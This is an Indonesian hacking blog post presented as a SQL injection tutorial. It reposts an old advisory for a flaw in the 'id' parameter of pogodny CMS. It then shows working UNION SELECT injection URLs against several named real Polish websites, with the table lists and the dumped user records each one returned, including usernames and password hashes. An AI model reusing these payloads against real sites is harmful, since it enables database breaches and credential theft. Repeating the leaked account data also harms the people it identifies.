Y00AOebLhlCX59D11qensmHJY7s Tutorial SQL Injection by matthews Created (c) by Princexells Seyka (Princelling Saki)

Minggu, 25 Agustus 2013

0 Tutorial SQL Injection by matthews

gunakan ini untuk belajar yah kk kk Q , seperti belajar manual atau pakek scehmafuzzy ,


bug take from http://www.exploit-db.com/exploits/11473

--------------------------------------------------------------------------------------------------------------

Vulnerability Info:
# Type: SQL injection Vulnerability
# Risk: High

Fix:
# N/A Vendor notified 08.02.2010

It was found that "pogodny CMS" does not validate properly the "id" parameter
value.

Solution:
# Input validation of "id" parameter should be corrected.


Vulnerability:
# http://server/?modul=niusy&id=61[Sqli]

Credit:
# Discoverd By: MG
# Website: http://Ariko-security.com
# Contacts: support[-at-]ariko-security.com


Ariko-Security
[email protected]
tel.: +48512946012 (Mo-Fr 10.00-20.00 CET)


---------------------------------------------------------------------------------------------------------------------------------------------------



pogodny_users,pogodny_users_kategorie
id,user,osoba,haslo,mail,www,kategoria,newsletter,sesja,opis,data_dodania,data_aktualizacji

http://www.krupowa.pttk.pl/index.php?modul=niusy&id=20%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

9:test::b9e71e448bd6b4c525a34bec398f2244:[email protected]


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20group_concat%28table_name%29,2+from+information_schema.tables+where+table_schema=database%28%29--

forum_acl_users  forum_config

http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20group_concat%28column_name%29,2+from+information_schema.columns+where+table_name=0x666F72756D5F636F6E666967--

config_name,config_value,is_dynamic

http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20concat_ws%280x3a,config_name,config_value,is_dynamic%29,2+from+forum_config

increment_user_id:0:1

http://www.michalin.pl/index.php?modul=niusy&id=82%20union%20select%20group_concat%28column_name%29,2+from+information_schema.columns+where+table_name=0x666F72756D5F61636C5F7573657273--

user_id,forum_id,auth_option_id,auth_role_id,auth_setting

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://wybicki.net/index.php?modul=niusy&id=5%20union%20select%20group_concat%28table_name%29,2%20+from+information_schema.tables+where+table_schema=database%28%29--

pogodny_banery,pogodny_download,pogodny_download_kategorie,pogodny_faq,pogodny_galeria,pogodny_goscie,pogodny_komentarze,pogodny_komunikat,pogodny_linki,pogodny_linki_kategorie,pogodny_niusy,pogodny_niusy_kategorie,pogodny_statystyka,pogodny_taknie,pogodny_trejs,pogodny_users,pogodny_users_kategorie,pogodny_ustawienia,pogodny_zdjecia,pogod

http://wybicki.net/index.php?modul=niusy&id=5%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

12:liceum25:KR:b89819cc09f665536c27ae969d6bfbdb:[email protected]


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------


http://www.rolnet.pl/index.php?modul=niusy&id=15%20union%20select%20group_concat%28table_name%29,2%20+from+information_schema.tables+where+table_schema=database%28%29--

pogodny_banery,pogodny_download,pogodny_faq,pogodny_galeria,pogodny_goscie,pogodny_komentarze,pogodny_komunikat,pogodny_linki,pogodny_linki_kategorie,pogodny_niusy,pogodny_niusy_kategorie,pogodny_statystyka,pogodny_taknie,pogodny_trejs,pogodny_users,pogodny_users_kategorie,pogodny_ustawienia,pogodny_zdjecia,pogodny_zdjecia_kategorie

http://www.rolnet.pl/index.php?modul=niusy&id=15%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

10:rolNET9::9c094856dffb5591ea952e7df152b018:[email protected]


----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

http://www.wdrodzenaratunek.pl/index.php?modul=niusy&id=6%20union%20select%20group_concat%28table_name%29,2%20+from+information_schema.tables+where+table_schema=database%28%29--

pogodny_banery,pogodny_download,pogodny_faq,pogodny_galeria,pogodny_goscie,pogodny_komentarze,pogodny_komunikat,pogodny_linki,pogodny_linki_kategorie,pogodny_niusy,pogodny_niusy_kategorie,pogodny_statystyka,pogodny_taknie,pogodny_trejs,pogodny_users,pogodny_users_kategorie,pogodny_ustawienia,pogodny_zdjecia,pogodny_zdjecia_kategorie

http://www.wdrodzenaratunek.pl/index.php?modul=niusy&id=6%20union%20select%20concat_ws%280x3a,id,user,osoba,haslo,mail%29,2+from+pogodny_users--

48:kolacz:Joanna Kolacz:02885d951271d7607bcf342305ad6557:[email protected]





Artikel Terkait

Ditulis Oleh : Nyubi Crew

Artikel Tutorial SQL Injection by matthews ini ditulis oleh Nyubi Crew pada hari Minggu, 25 Agustus 2013. Terimakasih atas kunjungan Anda pada blog ini. Kritik dan saran tentang Tutorial SQL Injection by matthews dapat Anda sampaikan melalui kotak komentar diatas.